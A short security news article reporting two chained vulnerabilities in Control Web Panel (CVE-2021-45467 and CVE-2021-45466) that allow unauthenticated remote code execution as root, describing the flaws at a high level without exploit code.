Two vulnerabilities were discovered in Control Web Panel (CWP) – a widely-used web hosting management platform utilized by more than 200,000 servers. The flaws could allow code execution as root on Linux servers, and were discovered by Octagon Network researcher Paulos Yibelo.
CVE-2021-45467 and CVE-2021-45466 CWP Vulnerabilities
The flaws were given the following identifiers: CVE-2021-45467 (a file inclusion bug) and CVE-2021-45466 (a file write issue). It should be noted that the vulnerabilities could be used for remote code execution attacks, when used (chained) together.
More about CWP and the Attacks
CWP is previously known as CentOS Web Panel, and is an open-source Linux control panel software designed for creating and managing web host environments. CWP supports several operating systems, including CentOS, Rocky Linux, Alma Linux, and Oracle Linux.
Both vulnerabilities were located in parts of the CWP panel which are exposed and without authentication in the webroot.
After hosting CWP on a local environment it quickly became evident that most features require administrative or user accounts to perform. Since we are interested only in vulnerabilities that can be exploited without user authentication or interaction, we will avoid all the restricted sections and focus our research on parts of the panel that are exposed without authentication in the webroot. Turns out, not a lot is exposed, the report explained.
To exploit the flaws and inject malicious code from a remote resource in an RCE attack scenario, the threat actor only needs to alter the include statement, used to insert the content of one PHP file into another PHP file prior to the server executing it. The researchers will release a full PoC for red teams that achieves preauth RCE, once enough servers migrate to the latest version.
Full technical disclosure is available in the original report.
Related Story: Windows Subsystem for Linux Presents a New Attack Surface